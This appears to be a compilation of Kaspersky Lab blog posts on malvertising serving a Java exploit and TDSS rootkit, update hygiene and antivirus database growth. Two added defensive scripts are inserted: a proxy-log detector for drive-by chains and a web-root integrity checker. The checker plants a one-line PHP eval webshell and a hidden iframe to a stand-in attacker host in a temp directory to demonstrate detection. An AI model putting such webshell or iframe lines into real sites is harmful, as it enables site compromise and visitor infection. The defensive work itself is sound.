12 Nov LANDesk Interchange 2011, Poison Ivy, and US Incidents Kurt Baumgartner
15 Sep Lab Matters - The Evolution of Anti-Malware Protection Ryan Naraine
14 Jul Cloud Security vs Cybercrime Economy: The Kaspersky Vision Ryan Naraine
04 May Malvertising on ImageShack David Jacoby
15 Mar Webcast - The Good and Bad of Android Security Ryan Naraine
19 Jul Do you update? Roel
LANDesk Interchange 2011 is winding down in Las Vegas today. The event gathered partners and showcased newer technologies from the decade-old systems management company. It was interesting hearing IT "old-timers" who have worked with the technology describe the company's impact on the industry: its spinoff from Intel, the original LANDesk AV product that wound up in another vendor's product, and what they like about the integration of Kaspersky Lab technologies into the security suite. We were happy to present at our partner's conference with "The Dark Side of Unmanaged Desktops", where I described 2011 incidents that both I and our Global Emergency Response Team have investigated and remediated, some incidents in the news, and some of the IT mismanagement issues that enabled these incidents to occur.
Kaspersky Lab chief technology officer Nikolay Grebennikov joins Ryan Naraine to discuss the evolution of anti-malware software. Grebennikov talks about the changing face of the malicious threat facing desktop users and the additional components added to Kaspersky's anti-malware products to move beyond signature-based detection of threats. He goes into detail about heuristics and emulation, behavior-based detection and newer proactive technologies to handle real-time malware detection.
In this webcast, Eugene Kaspersky, CEO and co-founder of Kaspersky Lab, shares his extensive knowledge of the driving forces that power the modern cyber-criminal ecosystem and discusses the way that cybercrime operates. He covers the latest developments in security technologies and describes how he sees the security industry developing in the near future. Additionally, Eugene pays particular attention to showing how modern cloud security solutions not only protect users and businesses, but can seriously impede the cyber-criminals' black economy, thereby significantly reducing cyber-crime.
Today while conducting research on the alleged Latvian power hack, I came across some interesting malvertising on imageshack, where pictures of the purported hack have been hosted.
Advertising on the page loads an exploit for a Java vulnerability, which Kaspersky detects as Exploit.HTML.CVE.2010-4452.m; the exploit then tries to download Trojan.win32.TDSS.cgir. TDSS, as some of you may recognize, is a rootkit that operates at the lowest levels of Windows and can prove extremely difficult to remove.
Upon opening the page, the advertisement loads and a connection to http://--removed--ediagroup.com/enc/jv.html is made; this page launches the actual exploit. A second page, http://--removed--ediagroup.com/load.php?2, is then loaded, which drops the Trojan carrying the TDSS malware.
Kaspersky already detects both the exploit and the Trojan payload. This serves as a reminder of the importance of keeping your anti-virus up to date.
We will update with further details as they become available.
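The chain described above (landing page, advertisement, exploit page, executable payload from the same host) leaves a recognizable footprint in web-proxy logs. The following is an added example, not code from the original post: it parses constructed proxy log lines and flags a client that fetched an HTML page and, shortly afterwards, a binary from the same host. The hostnames (imageshack.example, ads.badmedia.example), client addresses and the Squid-like log layout are constructed placeholders, not the redacted domain from the post.

```python
"""Added example (not from the original post): correlate proxy log lines to
spot a landing page whose advertisement pulls an exploit page and then an
executable payload from the same host. All hosts, clients and log lines are
constructed for the demonstration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "timestamp client method url status bytes mime".
SAMPLE_LOG = """\
2011-05-04T10:12:01 10.0.0.5 GET http://imageshack.example/photo/latvia.jpg 200 48211 image/jpeg
2011-05-04T10:12:02 10.0.0.5 GET http://ads.badmedia.example/enc/jv.html 200 1937 text/html
2011-05-04T10:12:03 10.0.0.5 GET http://ads.badmedia.example/load.php?2 200 190464 application/octet-stream
2011-05-04T10:15:00 10.0.0.9 GET http://news.example/index.html 200 10230 text/html
2011-05-04T10:15:01 10.0.0.9 GET http://cdn.example/lib.js 200 2033 application/javascript
"""

LINE_RE = re.compile(
    r"(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<bytes>\d+) (?P<mime>\S+)"
)
# Content types under which a dropped Windows executable typically arrives.
BINARY_MIMES = {
    "application/octet-stream",
    "application/x-msdownload",
    "application/x-msdos-program",
}


def parse_log(text):
    """Turn the raw log text into dicts with a parsed timestamp and host."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected layout
        d = m.groupdict()
        d["ts"] = datetime.fromisoformat(d["ts"])
        d["host"] = d["url"].split("/")[2]
        events.append(d)
    return events


def find_exploit_chains(events, window=timedelta(seconds=30)):
    """Return (client, referring_page, exploit_page, payload_url) tuples for
    every client that fetched an HTML page and, within `window`, a binary
    from the same host. The referring page is the previous request from a
    different host, i.e. the page that carried the advertisement."""
    hits = []
    by_client = defaultdict(list)
    for e in events:
        by_client[e["client"]].append(e)
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        for i, page in enumerate(evs):
            if page["mime"] != "text/html":
                continue
            for follow in evs[i + 1:]:
                if follow["ts"] - page["ts"] > window:
                    break  # events are sorted, nothing later is in the window
                if follow["host"] == page["host"] and follow["mime"] in BINARY_MIMES:
                    referrer = None
                    if i > 0 and evs[i - 1]["host"] != page["host"]:
                        referrer = evs[i - 1]["url"]
                    hits.append((client, referrer, page["url"], follow["url"]))
    return hits


if __name__ == "__main__":
    for hit in find_exploit_chains(parse_log(SAMPLE_LOG)):
        print("possible drive-by chain:", hit)
```

The same-host, short-window heuristic is deliberately narrow; in practice the landing page and payload host often differ, so a production rule would also key on the referrer header and on a Java or browser user-agent for the exploit-page request.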
In this episode of Lab Matters, Kaspersky Lab malware researcher Tim Armstrong joins Ryan Naraine to examine the security posture of the Android mobile operating system. Armstrong looks at strengths and weaknesses of the open-source platform and warns about the risks associated with jailbreaking/rooting Android devices.
Most people I talk to claim that they are strong believers in updating. They update their operating system, applications that come with the operating system and security software almost religiously.
In turn, most of these people are surprised when they hear that they should regularly check for updates to all the software they use. One example is some popular media players: some time ago, vulnerabilities were found in them which allowed remote code execution. And now, of course, we're seeing the same situation with Microsoft Office.
Over time we have also seen an increased focus on exploiting server-based software. Just think back to Net-Worm.Perl.Santy.a, which caused a major epidemic by exploiting a vulnerability in unpatched phpBB forums. More recently we've seen a large number of hackers targeting a vulnerability in IPB forum software. This resulted in a lot of sites being compromised and/or defaced.
And right now we're seeing extensive defacements on sites using outdated versions of Joomla and/or Mambo.
It's clear if a site has been defaced. It won't be quite so obvious if a site has been compromised.
Although we’ve been telling people to update regularly for a long, long time, this latest case shows that we can’t say it too often. Once again: it's of the utmost importance you make sure that all of your software is up to date, both on your local machine and on any remote servers which you administer.
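A defacement announces itself; a quietly compromised site does not. The check that surfaces the second case is a file-integrity baseline of the web root, re-hashed after each update and on a schedule. Below is an added example, not code from the original post, that snapshots a directory tree with SHA-256, then reports added, modified and removed files. The web root, its PHP files and the simulated compromise (an injected hidden iframe and a dropped webshell) are all constructed inside a temporary directory so the script runs offline.

```python
"""Added example (not from the original post): a minimal file-integrity
baseline for a web root. The directory layout, file contents and simulated
compromise below are constructed for the demonstration."""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map each file under root (relative, forward-slash path) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Return (added, modified, removed) sorted path lists. A dropped webshell
    shows up as added, a backdoored index.php as modified."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed


def demo():
    """Build a constructed web root, take a baseline, simulate a compromise
    and return what the comparison reports."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "includes"))
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php echo 'hello'; ?>\n")
        with open(os.path.join(root, "includes", "config.php"), "w") as f:
            f.write("<?php $db = 'forum'; ?>\n")
        baseline = hash_tree(root)

        # Simulated compromise: hidden iframe appended to the front page and
        # a webshell dropped next to the configuration file.
        with open(os.path.join(root, "index.php"), "a") as f:
            f.write("<iframe src='http://evil.example/' width=0 height=0></iframe>\n")
        with open(os.path.join(root, "includes", "c99.php"), "w") as f:
            f.write("<?php eval($_POST['c']); ?>\n")

        return diff_baseline(baseline, hash_tree(root))


if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added)
    print("modified:", modified)
    print("removed:", removed)
```

Store the baseline off the web server (an attacker who can write to the web root can also rewrite a baseline kept there), and regenerate it immediately after every legitimate update so that patching does not drown the report in expected changes.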
Once upon a time, back in the USSR, I accidentally got a virus on my computer, an Olivetti M24.
And I started my anti-virus career. That was in September (or October) 1989. And the first record was added to my first utility to fight computer viruses (well, in this case, just one computer virus). It was a challenge for me to analyze the code - and develop an anti-infection routine. I was so curious, and of course I didn't realize that it would become so serious.
Now there's an industry, now there are thousands of people developing anti-* solutions (including hundreds in my company). And just last night we had a major milestone: we added the 200,000th record to our antivirus databases. Cruel world... Two hundred thousand antivirus records! And the number will continue to increase; we're already up to 200,157 records.
A couple of worried users have contacted us to ask if KAV is going to drop detection for old boot/DOS viruses in the future, or for extinct Trojan downloaders.
At the moment we've got no plans to do that. It could compromise detection, and in any case, given the way our engine works, dropping detection for DOS viruses would result in an insignificant speed increase of less than 5%.
The risk of getting infected by Michelangelo is probably pretty small nowadays, but it can't be entirely discounted. So rest assured, we'll keep on detecting those old boot and DOS viruses and the dead Trojan downloaders.
Like us, you might have seen a recent discussion about antivirus vendors' response times.
Just like the vendors involved, we believe that speed of response to new threats and update frequency are vital.
That's why we provide hourly updates, day in, day out, regardless of whether a particular threat makes headlines. This ensures that our users have access to effective protection against the 200+ new threats which appear every day.
Even though our response times weren't included in the discussion mentioned above, we consistently deliver a fast response. And that's what's most important.
It looks as though people have heard about our latest updates (1,400 signatures and about 25 new unpackers added in one week) and are hurrying to get their hands on our software.
Here are some statistics so you can see how our updates have evolved (the "Total records" column gives the database size on the date shown, in DD.MM form):
| Year | Records added per day | Total records in database (as of date, DD.MM) |
|------|-----------------------|-----------------------------------------------|
| 1998 | 15 | 20,172 (05.01) |
| 1999 | 18 | 25,733 (20.01) |
| 2000 | 26 | 32,572 (07.01) |
| 2001 | 25 | 42,233 (05.01) |
| 2002 | 15 | 51,495 (01.01) |
| 2003 | 53 | 63,082 (01.01) |
| 2004 | 87 | 82,515 (01.01) |
| This year | approx. 200 this week | 114,506 (01.01); 155,372 (21.10) |